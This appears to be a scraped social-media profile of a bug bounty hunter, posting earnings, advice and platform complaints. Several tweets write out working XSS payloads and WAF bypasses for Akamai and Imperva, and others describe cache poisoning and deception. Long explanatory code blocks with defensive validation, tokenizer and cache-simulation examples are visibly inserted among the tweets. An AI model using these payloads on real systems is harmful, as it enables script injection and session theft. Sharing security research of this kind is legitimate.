🇪🇨🍫 Profile

@bxmbn

Followers: 17,208
Following: 1
Media: 154
Statuses: 1,350

against the odds

Ecuador
Joined March 2019
@bxmbn
🇪🇨🍫
7 months
This year I completed 500k in bounties. Most rewarded vulnerabilities, and the ones I always focused on since the beginning:
1. XSS (all types)
2. Cache Poisoning
3. BACs
Reached this amount totally from scratch, learning from the internet. No certs. 0 automation. 0 collabs.
@bxmbn
🇪🇨🍫
1 year
May was a good one 🫶🏽
@bxmbn
🇪🇨🍫
1 year
Total earnings by year:
2020 - $850.00
2021 - $19,750.00
2022 - $86,744.50
2023 so far - $168,034.00
17 y/o me never thought about it. Started with 0 knowledge, curious, trying to make money while being at home due to the pandemic; with patience it became my main source of income.
@bxmbn
🇪🇨🍫
1 year
While testing for CVE-2023-24488 I found various servers behind Akamai, and since the original payload gives a Forbidden response I found this bypass:
post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
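The redirect value in the post above is only dangerous because the origin reflects it without checking it against the client's registered post-logout URIs. The JavaScript below is an added example, not code from the tweet, from Citrix or from Akamai; it shows the origin-side check a practitioner would want regardless of what the WAF does: extract the parameter as the server sees it, reject control characters, parse it as a URL, require an exact origin-and-path match against an allowlist, and HTML-encode whatever is echoed. The allowlist entries, host names and the renderLogoutPage function are assumptions made for the example.

```javascript
// Added example (not the tweet's code, not Citrix or Akamai code). Hypothetical
// origin-side validation of an OIDC post_logout_redirect_uri value.
'use strict';

// Constructed allowlist: the post-logout URIs a client registered at setup.
const REGISTERED_POST_LOGOUT_URIS = [
  'https://app.example.test/logged-out',
  'https://portal.example.test/auth/signed-out',
];

// The tweet's query string, as sent on the wire. Note that the '&' in it splits
// the payload across two parameters; the server only reflects what lands in
// post_logout_redirect_uri plus whatever else it echoes.
const TWEET_QUERY =
  'post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E';

// Decode one query parameter the way a typical server stack does ('+' is a space).
function getParam(query, name) {
  return new URLSearchParams(query).get(name);
}

// Minimal HTML encoder for the text and attribute contexts used below.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Return the normalized allowed URI, or null. Exact match on scheme, host,
// port and path is what a registered post-logout URI means; prefix or
// substring matching is how open-redirect and XSS bypasses get through.
function validatePostLogoutRedirect(rawValue, allowlist = REGISTERED_POST_LOGOUT_URIS) {
  if (typeof rawValue !== 'string' || rawValue.length === 0 || rawValue.length > 2048) return null;
  // The tweet's payload opens with CR LF CR LF; any control character is
  // grounds for rejection before the URL parser gets to strip it away.
  if (/[\u0000-\u001f\u007f]/.test(rawValue)) return null;
  let url;
  try { url = new URL(rawValue); } catch (e) { return null; }
  if (url.protocol !== 'https:' || url.username || url.password) return null;
  // Compare origin + path only; query and fragment are not part of registration.
  const candidate = url.origin + url.pathname;
  return allowlist.includes(candidate) ? candidate : null;
}

// Hypothetical logout page renderer: only a validated value is echoed, and it
// is still encoded for the attribute and text contexts it lands in.
function renderLogoutPage(rawValue) {
  const target = validatePostLogoutRedirect(rawValue);
  if (target === null) return '<p>You have been signed out.</p>';
  return `<meta http-equiv="refresh" content="0;url=${htmlEncode(target)}">` +
    `<p>Redirecting to <a href="${htmlEncode(target)}">${htmlEncode(target)}</a></p>`;
}

// What the server sees for the tweet's request: "\r\n\r\n<body x='" (the rest
// of the markup went into a second parameter named "'onload").
const TWEET_VALUE = getParam(TWEET_QUERY, 'post_logout_redirect_uri');
```

The control-character check sits before the URL parse on purpose: the WHATWG URL parser silently strips leading and trailing C0 controls, so a parse-then-compare approach would never see the CRLF prefix that the tweet's payload relies on.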
@bxmbn
🇪🇨🍫
1 year
If you are a beginner in bug bounty, I recommend you don't ever buy any courses, nor look for mentors. Nothing will guarantee you success in bug bounty. I learned and keep learning myself by googling, reading hacktivity reports etc. Never spent a single dollar to learn. Just some advice.
@bxmbn
🇪🇨🍫
1 year
Been hunting for almost 3 years now, only focusing on XSS; learned other vulns by just reading, never bought courses, don't use automation tools, not even Burp Pro, and still manage to make a solid monthly income. It's not hard; if you see it as hard, then it will be hard.
@bxmbn
🇪🇨🍫
9 days
It was worth the wait: CVE-2023-35813
@bxmbn
🇪🇨🍫
11 months
I was rewarded $9,600 in bounties today and achieved what seemed to be impossible for a long time: Top 100 All-Time ✅
@bxmbn
🇪🇨🍫
2 months
March's total bounties: $32,119
5 Broken Access Control: $17,237
4 Reflected XSS: $9,671
2 Cache Deception: $2,789
1 Cache Poisoning - Stored XSS: $1,250
Retests and bonuses: $1,172
@bxmbn
🇪🇨🍫
1 year
Today's XSS in a multi-reflection case:
xss%27);}}});alert(document.cookie);$(function+a(){a();});$(function+a(){if(a){}else+if(a){/*///
@bxmbn
🇪🇨🍫
11 months
Found these parameters, but they were being URL encoded as normal parameters. Since I was trying to find an injection point for a Cache Poisoning XSS, I sent them as cookies and they were not being URL encoded anymore. Strong WAF? No problem either ✅ It's just art at this point 🎨🖌️
@bxmbn
🇪🇨🍫
10 months
Everything after /? is being reflected: ?xss is reflected as uppercase, =xss as lowercase. The app is using Imperva WAF; however, that feature allowed me to bypass it using:
%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
@bxmbn
🇪🇨🍫
9 months
My main goal is to get a million in bounties and prove to all of you that you can succeed in Bug Bounty only by: knowing the basics. Not using tools/automation. Thinking like a real black hat.
@bxmbn
🇪🇨🍫
1 year
June was the best one 🫡
@bxmbn
🇪🇨🍫
11 months
Top BB hunters stay at the top because they never share their methodology, and if they do, it is always for a few people, never publicly. This is probably one of the reasons why most of them have never even disclosed a single report.
@bxmbn
🇪🇨🍫
11 months
Blocked: <details/open=/Open/href=/data=+ontoggle="(alert)(document.domain)
Bypass: <details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
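Whether a WAF pattern fires on `/data=` versus `/data=;` says nothing about what the browser does with the tag: both versions above tokenize to the same attributes, and the Imperva bypass from the earlier post (`<input onfocus='/*=*/Function("ale"+"rt(document.domain)")();//'autofocus`) likewise ends up as a plain onfocus attribute once the tokenizer has run. The JavaScript below is an added example, not code from the tweets or from any WAF vendor: a reduced HTML start-tag tokenizer that follows the WHATWG attribute states closely enough to show what the browser sees, and the attribute-context encoder that is the actual fix at the origin. The `<div title="...">` template it encodes into is assumed.

```javascript
// Added example (not the tweets' code, not any WAF vendor's logic). A reduced
// HTML start-tag tokenizer plus the attribute-context encoder that fixes the
// reflection at the origin.
'use strict';

// Tokenize one start tag into { name, attrs: [{ name, value }] } (null if the
// input does not start with '<'). Follows the WHATWG tokenizer's attribute
// states for the cases that matter here: '/' and whitespace both separate
// attributes, an unquoted value runs to whitespace or '>' (so '/' stays inside
// it), a quoted value runs to the matching quote, and a name that directly
// follows a closing quote ("...'autofocus") starts a new attribute. Names are
// lowercased as the tokenizer does; character references are left undecoded.
function tokenizeStartTag(input) {
  if (input[0] !== '<') return null;
  let i = 1;
  let name = '';
  while (i < input.length && !/[\s\/>]/.test(input[i])) name += input[i++];
  const attrs = [];
  while (i < input.length) {
    const c = input[i];
    if (c === '>') break;
    if (/[\s\/]/.test(c)) { i++; continue; }             // before-attribute-name
    let aname = '';
    if (c === '=') { aname = '='; i++; }                 // leading '=' is part of the name
    while (i < input.length && !/[\s\/>=]/.test(input[i])) aname += input[i++];
    while (i < input.length && /\s/.test(input[i])) i++;  // after-attribute-name
    let value = '';
    if (input[i] === '=') {
      i++;
      while (i < input.length && /\s/.test(input[i])) i++; // before-attribute-value
      const q = input[i];
      if (q === '"' || q === "'") {
        i++;
        while (i < input.length && input[i] !== q) value += input[i++];
        i++;                                           // closing quote (or EOF)
      } else {
        while (i < input.length && !/[\s>]/.test(input[i])) value += input[i++];
      }
    }
    attrs.push({ name: aname.toLowerCase(), value });
  }
  return { name: name.toLowerCase(), attrs };
}

// Names of on* attributes the browser would wire up as event handlers.
function eventHandlerAttrs(tag) {
  return tag ? tag.attrs.filter(a => /^on[a-z]/.test(a.name)).map(a => a.name) : [];
}

// Output encoding for a quoted attribute value: every character that can end
// the value or start a new attribute becomes a numeric character reference.
function encodeForAttribute(s) {
  return String(s).replace(/[&<>"'`=\/]/g, c => '&#x' + c.charCodeAt(0).toString(16) + ';');
}

// Inverse of the encoder, standing in for the browser's reference decoding so
// a check can confirm the data survives intact.
function decodeHexRefs(s) {
  return s.replace(/&#x([0-9a-f]+);/gi, (m, h) => String.fromCodePoint(parseInt(h, 16)));
}

// Assumed origin template that reflects a value into a double-quoted attribute.
function renderTitle(value) {
  return `<div title="${encodeForAttribute(value)}">`;
}

// The tweets' payloads, URL-decoded ('+' is a space on the wire).
const DETAILS_BLOCKED = '<details/open=/Open/href=/data= ontoggle="(alert)(document.domain)';
const DETAILS_BYPASS = '<details/open=/Open/href=/data=; ontoggle="(alert)(document.domain)';
const INPUT_BYPASS = decodeURIComponent(
  '%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+'
    .replace(/\+/g, ' '));
```

Running the three payloads through tokenizeStartTag gives `ontoggle` for both details variants (the `;` only changes the value of `open`) and `onfocus` plus `autofocus` for the input variant; the same payload passed through renderTitle yields exactly one attribute, `title`, whose decoded value is the original input.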
@bxmbn
🇪🇨🍫
1 year
This program rewards bounties even on weekends. This program's dedication is the reason why I'm having success.
@bxmbn
🇪🇨🍫
1 month
April's total bounties: $11,689
5 Reflected XSS: $6,948
3 Broken Access Control: $1,400
1 Cache Deception: $3,000
Retests and bonuses: $341
Worst bounty month since January of last year ($8,519)
@bxmbn
🇪🇨🍫
3 months
Stored XSS using Google Reviews 2. If you wonder why I submitted the review like that, it was because if I put </script> Google would render it as blank (try it). So I submitted another review with another account containing the rest of the payload so it could work: ><svg onload=..
@bxmbn
🇪🇨🍫
11 months
Story time: @Agornello Caesar (turtle_shell) was the one who taught me about Cache Poisoning without even asking for it. After that report my life pretty much changed; I took every piece of advice and took advantage of it. This is how important triagers can be in the life of a researcher.
@Agornello
nadino
1 year
Today was my last day working at @Hacker0x01 ! It has been an incredible journey and I had the pleasure to work with an amazing team. Much kudos to all the triagers out there, it's a hard job and they are real heroes. Also <3 to (most of) the hackers. turtle_shell / caesar
@bxmbn
🇪🇨🍫
8 months
Great start this month 🍁
@bxmbn
🇪🇨🍫
6 months
Write ups coming up in 2024:
- Accessing 30 Million Users' Orders
- How I was able to steal your Insurance Plan
- UI:None Cache Poisoning/Deception Cases
- Stealing Bank Mail Offers To PII Leak
- Akamai Biggest Problem
Comment which one you want to see first 🤔
@bxmbn
🇪🇨🍫
9 months
It's been 3 years since I started bug bounty hunting. 600+ resolved reports in ~100 companies. Still so much to learn and so much to earn as well 🫶🏽
@bxmbn
🇪🇨🍫
1 year
Thank you to all CDN providers for inventing caching. Special mention to devs who don't sanitize headers and cookies either 🫡
@bxmbn
🇪🇨🍫
11 months
magicId=00192729301
Set-Cookie: SessionId=<sessionId.00192729301>
magicId=00192729302
Set-Cookie: SessionId=<sessionId.00192729302>
2023 and we still have these types of bugs lol. By the way, this is P1 in my books 🤓👆🏽
@bxmbn
🇪🇨🍫
1 year
Will June be a good one too? 📝✍🏽 I just need more private invites 🤞🏽
@bxmbn
🇪🇨🍫
1 year
Updated my H1 Profile 🫡
@bxmbn
🇪🇨🍫
10 months
Each parameter reflects as event attributes in each input tag, but each parameter is limited to 10 characters. Being limited to 10 characters was a good thing because it also allowed me to bypass the WAF 🤓
VR11=onfocus='`&VR12=`;alert/*&VR13=*/(1)'a='&VR14='autofocus
@bxmbn
🇪🇨🍫
1 year
Critical bounty today to finally reach the 10,000 rep milestone. It's crazy that a few days ago I was at 8,384 rep 🔝
@bxmbn
🇪🇨🍫
10 months
The request header is easy to find as it's a response header that reflects in all pages; they also have a public program, it affects the main domain, and there are a lot of hackers who know this attack on the leaderboard. Maybe this can confirm I have the best WAF bypass 😌
@bxmbn
🇪🇨🍫
1 year
My tweets were able to get me an invite 🙏🏽 I might be able to continue at the top 🤞🏽
@bxmbn
🇪🇨🍫
1 month
We all agree Bug Bounty is: 50% luck, 50% skill?
@bxmbn
🇪🇨🍫
1 year
You see the results, but behind this there were a lot of NAs, duplicates, Informatives, especially when I first started, months of not finding anything. The difference is that I never quit 💪🏽
@bxmbn
🇪🇨🍫
8 months
High 8.9 = $2,000
Critical = $5,000 😔👍🏽
@bxmbn
🇪🇨🍫
6 months
There are some changes guys 😝
• I cannot do the Akamai one yet, but sometime in 2024 I should have the green light
• There was actually a mistake: it's 3 million, not 30. Still a mass data breach due to the sensitive info exposed
Will publish 2 blogs on January 5th
@bxmbn
🇪🇨🍫
5 months
Goals for the new year? None. I had none last year and it was my most successful year in every aspect to date; my old self wouldn't even believe it. If you set goals, you are limiting yourself; you could do more than anything you set today. Happy New Year!
@bxmbn
🇪🇨🍫
8 months
Got some delayed bounties. In September T-Mobile BBP robbed me of like 15k, fixing crits and not paying, but all good 😝
@bxmbn
🇪🇨🍫
8 months
HackerOne vs Bugcrowd
Programs with higher bounties. Winner: Bugcrowd
Exclusive programs (top companies). Winner: H1
Support. Winner: Bugcrowd
Triagers (communication, knowledge and response times). Winner: H1 (by a lot)
@bxmbn
🇪🇨🍫
10 months
August ☀️
@bxmbn
🇪🇨🍫
1 year
Waking up and seeing this. I call this passive income 🤓👆🏽
@bxmbn
🇪🇨🍫
3 months
Today, I learned that if there is a bypass I should not name the title of the report “Bypass of …” anymore
@bxmbn
🇪🇨🍫
1 year
I have probably the best Akamai XSS bypass to date. It works every time; I could share it, but if I do, Akamai will fix it. Devs should sanitize their inputs so that they don't rely on a WAF, plus I make more money 😼🤝🏼😼
@bxmbn
🇪🇨🍫
1 year
Will disconnect for a while 🫡 Finished sending my last reports; hopefully they all get triaged so they can cover all my expenses for the following days 🛫🏝️
@bxmbn
🇪🇨🍫
9 months
Scope Updates and Private Invites = 💰
@bxmbn
🇪🇨🍫
2 months
My reaction when my hardest xss bypass gets closed as an ‘internal’ duplicate
@bxmbn
🇪🇨🍫
9 months
Found a vulnerable request that always loads when navigating through the app. The cache duration is great; I just need to wait until it expires and poison it with XSS to achieve ZERO UI stored XSS. And the best part of it: big company + I use their services.
@bxmbn
🇪🇨🍫
5 months
I got duplicated for a POST-based XSS, but my report is a normal RXSS that leads to account takeover with a totally different path and parameter. The triager made a mistake and invited me to participate, and I found that the reporter asked the team to REMOVE Cloudflare 🤣🤣
@bxmbn
🇪🇨🍫
1 month
Me after reporting a Critical CVE and getting rewarded a Critical Bounty
@bxmbn
🇪🇨🍫
9 months
Finally man!! Last time I got multiple invitations was literally a year ago. Time to make more bounties before the year ends 🙏🏽
@bxmbn
🇪🇨🍫
5 months
Gotta keep your eyes open ✅
@bxmbn
🇪🇨🍫
2 months
More and more BBP programs leaving/closing at a crazy rate. New VDPs every month. Almost 300 reports in less than a week for this new VDP. We are doomed.
@bxmbn
🇪🇨🍫
1 year
I'm making more than the average and most professions. Getting into bug bounty was the best decision I took, even though I tried to quit at some point because I was not seeing results. Life is about decisions. Great things never come easy. Top 100 all time soon.
@bxmbn
🇪🇨🍫
7 months
Cache Poisoning XSS that does not require a file extension to cache and affects multiple pages should be treated as Critical. It's insane that still to this day, and after reporting them multiple times, the severity is treated as if it was a normal limited stored XSS.
@bxmbn
🇪🇨🍫
3 months
Some of the reasons why VDPs still exist today: *VDP-only hackers this year so far*
@bxmbn
🇪🇨🍫
7 months
Got a bank offer to my mail, and found a very nice IDOR
@bxmbn
🇪🇨🍫
1 year
In 14 days I will be disclosing two reports. Can't wait for you to see these, especially the XSS one; it was a pretty clever find!
@bxmbn
🇪🇨🍫
4 months
3 months ago, I bought stocks in a company using some of the bounties I earned with them, and the company is up more than 40% now
@bxmbn
🇪🇨🍫
9 months
Don't report bugs to VDPs, especially those that are multi-millionaire companies; this way we can force them to open BBPs 😝
@bxmbn
🇪🇨🍫
3 months
Proud to have a 740 credit score and 100k available credit at 20 years old in just 2 years of credit 🔐
@bxmbn
🇪🇨🍫
7 months
At least they rewarded the bounty before banning me. It was a good program after all; made 110k in this program alone. But they disappointed me with their decision.
@bxmbn
🇪🇨🍫
2 months
Me when VDP points get removed from all platforms and seeing all VDP Hackers go down to 0 points:
@bxmbn
🇪🇨🍫
11 months
Today was also retesting day in H1👌🏽
@bxmbn
🇪🇨🍫
1 year
For anyone wondering, more than half of my earnings are just XSS vulnerabilities. Q2 2022 is when I learned about Cache Poisoning. This is why you see the increase in bounties since then: I found multiple Stored XSS via Cache Poisoning and stuck with it afterwards.
@bxmbn
🇪🇨🍫
11 months
Best triagers in HackerOne: Caesar, Carlos, Alexander, Juan, Moe, Decimo
@bxmbn
🇪🇨🍫
2 months
Average life of BBP-Only Hunters
@bxmbn
🇪🇨🍫
1 year
Most of my generation will be graduating by 25 and they might have saved a bit of money. Me at 20: I'm on my way to retire at 25 📈 🤞🏽
@bxmbn
🇪🇨🍫
7 months
I noticed that you get private invitations based on what you search on Google. I was looking for cars at 1am today and got a private invite from a car company at 4am. I was able to confirm this since I saw the same behavior on the other platform I already hunt on.
@bxmbn
🇪🇨🍫
2 months
@mouka0x Hashtag in this post: #BugBounty 💰
Your bounties: $0,0000 😔
AON VDP: Thank you so much, I don't need to open a BBP anymore 😊🥰
@bxmbn
🇪🇨🍫
3 months
People that hunt on VDPs are what keeps them alive. We can all force them to open BBPs only if nobody hunts on VDPs.
@SchizoDuckie
🦆 SchizoDuckie 🦆
3 months
Presented without further comment.
@bxmbn
🇪🇨🍫
11 months
Feels good when you receive a program invite and you already use their services. So far: 1 Critical, 1 High, 7 Mediums. This always gives you a huge advantage, especially on a program with limited scope, since other hackers need to go through the process of creating an account.
@bxmbn
🇪🇨🍫
8 months
Stored XSS ≠ Oauth Misconfiguration 🤓👆🏽
@bxmbn
🇪🇨🍫
10 months
DMs are open. If you need help on anything, just DM :)
@bxmbn
🇪🇨🍫
1 year
You have to love NOT finding bugs in order to succeed in bug bounty.
@bxmbn
🇪🇨🍫
9 months
Always wondered why Chinese companies offer such low bounties
@bxmbn
🇪🇨🍫
11 months
Found an XSS endpoint where the server creates files without sanitization. You can create a file then share it with anyone; you can also edit users' files to save XSS in them using the uniqueId, which is vulnerable to IDOR. What's your CVSS score?
@bxmbn
🇪🇨🍫
3 months
Programs leaving at this rate is crazy 🧐
@bxmbn
🇪🇨🍫
11 months
I finally got it🫡
@bxmbn
🇪🇨🍫
7 months
This program is just unbelievable: they have mass PII leak as Critical, I reported a mass PII leak and they only rewarded it as High. They didn't follow their own policy, nor explained why. But then I found an RXSS and they did follow their policy this time and rewarded it as Low 🙂
@bxmbn
🇪🇨🍫
1 year
HackerOne should pay me for indirectly promoting them 😂 Like every time I tweet about my bounties new people ask me how to start. I will be happy only with more private invites tho @Hacker0x01 👀
@bxmbn
🇪🇨🍫
7 months
Why do programs add sensitive assets IN-SCOPE if they are going to ban me because I deleted production data? How am I supposed to show impact? This time I didn't even know the IDOR was going to work. Why is it my fault? Why add assets like this in-scope anyway? I just don't get it.
@bxmbn
🇪🇨🍫
1 year
Biggest tip I can give you: don't get mad or sad about others' success. If you get mad as a result of other people's success you are not going anywhere, you are lost. Instead, take it as a challenge; you will overcome yourself and it will help you in anything in life.
@bxmbn
🇪🇨🍫
8 months
I'm by myself in a program with 446 rep points and a total of 32,900 in bounties paid. Top bounty: 5k. While I'm also in another program where there is only 1 hacker that has earned 20,000 in bounties but WITH 444 rep points. Top bounty: 3k. Rep system is broken in H1 😭
@bxmbn
🇪🇨🍫
1 year
1 year as an H1 Clear member. I have seen few to zero benefits from what they state you will get as an H1 Clear member....
@bxmbn
🇪🇨🍫
3 months
I never attacked anyone. If you can make these amounts of points in VDPs you have the ability to do the same in a BBP, that's all. They said it's not my business, but if more companies see they can still get good, impactful, quality reports without having to reward, we're fucked.
@bxmbn
🇪🇨🍫
1 year
I just read about the cache deception in ChatGPT. You have no idea how common cache deception is. Devs should know that if your app is behind Cloudflare you SHOULD have Cache Deception Armor enabled. I helped Cloudflare find a bypass for it.
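Several of the posts above (cookies and headers reflected without sanitization, the ZERO UI stored XSS through a long-lived cached response, and Cache Deception Armor) describe the same two cache failure modes. The Node.js script below is an added example, not code from the tweets, from Cloudflare or from any CDN: a toy shared cache in front of a toy origin, showing cache poisoning through an unkeyed reflected cookie and cache deception through a static-looking path that is routed to a per-user page, each beside the control that stops it (output encoding at the origin; refusing to cache by extension when the Content-Type disagrees, which is the idea behind Cache Deception Armor; honouring no-store). Hosts, paths, users and cookie names are constructed.

```javascript
// Added example (not code from the tweets, from Cloudflare or from any CDN).
// A toy shared cache in front of a toy origin: cache poisoning via an unkeyed,
// reflected cookie and cache deception via a static-looking path, each beside
// the control that stops it. Everything here is constructed.
'use strict';

// Extension -> Content-Type a cache would expect for a "static" file.
const STATIC_EXT = { css: 'text/css', js: 'application/javascript', png: 'image/png' };

function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Toy origin. opts.encode is the XSS fix for the reflected cookie;
// opts.noStorePrivate makes the per-user route mark itself uncacheable.
function makeOrigin(opts = {}) {
  const users = { 'sess-victim': { email: 'victim@example.test' } };
  return function origin(req) {
    const user = users[req.cookies.session];
    // Constructed route: the framework matches /account/me and ignores any
    // trailing segment, so /account/me/x.css reaches the same handler.
    if (/^\/account\/me(\/|$)/.test(req.path)) {
      if (!user) return { status: 401, headers: { 'content-type': 'text/html' }, body: 'login required' };
      return {
        status: 200,
        headers: { 'content-type': 'text/html', 'cache-control': opts.noStorePrivate ? 'no-store' : 'max-age=300' },
        body: `<p>Signed in as ${htmlEncode(user.email)}</p>`,
      };
    }
    // Public page that reflects the lang cookie: the unkeyed input from the tweets.
    const lang = req.cookies.lang || 'en';
    const shown = opts.encode ? htmlEncode(lang) : lang;
    return {
      status: 200,
      headers: { 'content-type': 'text/html', 'cache-control': 'max-age=300' },
      body: `<html lang="${shown}"><body>home</body></html>`,
    };
  };
}

// Toy CDN cache keyed on path only; cookies and headers are unkeyed, which is
// why poisoning works. opts.armor applies the idea behind Cloudflare's Cache
// Deception Armor: cache by extension only when the origin's Content-Type
// agrees with it. opts.honorNoStore respects the origin's no-store.
class ToyCache {
  constructor(origin, opts = {}) { this.origin = origin; this.opts = opts; this.store = new Map(); }
  fetch(req) {
    const hit = this.store.get(req.path);
    if (hit) return Object.assign({}, hit, { fromCache: true });
    const res = this.origin(req);
    if (this.shouldCache(req, res)) this.store.set(req.path, res);
    return Object.assign({}, res, { fromCache: false });
  }
  shouldCache(req, res) {
    if (res.status !== 200) return false;
    const cc = res.headers['cache-control'] || '';
    if (this.opts.honorNoStore && /no-store/.test(cc)) return false;
    const ext = (req.path.match(/\.([a-z0-9]+)$/) || [])[1];
    if (ext && STATIC_EXT[ext]) {
      // Extension rule: "static" files are cached regardless of cookies...
      if (this.opts.armor && res.headers['content-type'] !== STATIC_EXT[ext]) return false;
      return true;
    }
    return /max-age=\d+/.test(cc); // dynamic paths: only what the origin allows
  }
}

// Scenario 1 (poisoning): attacker sets a lang cookie carrying markup, the home
// page is cached with it, and a victim with no cookie at all gets the payload.
function runPoisoning(encode) {
  const cache = new ToyCache(makeOrigin({ encode }));
  const payload = '"><script>alert(document.domain)</script>';
  cache.fetch({ path: '/', cookies: { lang: payload } });
  const victim = cache.fetch({ path: '/', cookies: {} });
  return { fromCache: victim.fromCache, poisoned: victim.body.includes('<script>') };
}

// Scenario 2 (deception): the victim is lured to /account/me/x.css, the cache
// stores their HTML under a static-looking key, and the attacker reads it back.
function runDeception(cacheOpts = {}, originOpts = {}) {
  const cache = new ToyCache(makeOrigin(originOpts), cacheOpts);
  cache.fetch({ path: '/account/me/x.css', cookies: { session: 'sess-victim' } });
  const attacker = cache.fetch({ path: '/account/me/x.css', cookies: {} });
  return { fromCache: attacker.fromCache, leaked: attacker.body.includes('victim@example.test') };
}
```

Two points the toy makes concrete: the poisoning victim never sends the cookie, so a fix that only inspects the victim's request cannot help, and the deception cache stores a 200 text/html response under a .css key because the extension rule runs before anything looks at the response. Output encoding at the origin closes the first; the Content-Type check, or an origin that sends no-store on per-user routes to a cache that honours it, closes the second.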
@bxmbn
🇪🇨🍫
3 months
I stopped in OCT because I thought it was not that important anymore, and my biggest issue was that I didn't want platforms to benefit from it. I could've hidden their names but I just decided to stop, but here they are again: NOV bounties were: $39,312. Bounties from DEC to FEB:
@amans_3456
Aman Sharma
3 months
@bxmbn @scarybeasts hello @bxmbn, why don't you post your monthly bounties screenshot... which you were posting a few months before?
@bxmbn
🇪🇨🍫
2 months
VDP-Only Hunters when they find out their points are getting removed
@bxmbn
🇪🇨🍫
9 months
After two years H1 revoked my Clear status due to an unfair “unsafe testing” penalty. I feel like this penalty is too much given that it was my first ever warning since I got it, and part of the issue was the program's fault for not providing test creds 💔
@bxmbn
🇪🇨🍫
7 months
Triagers I trust 👆🏽🤓: Carlos, Alexander, Vanessa, Layla, Lucas, Enzo, Ivan, Wilson, Tal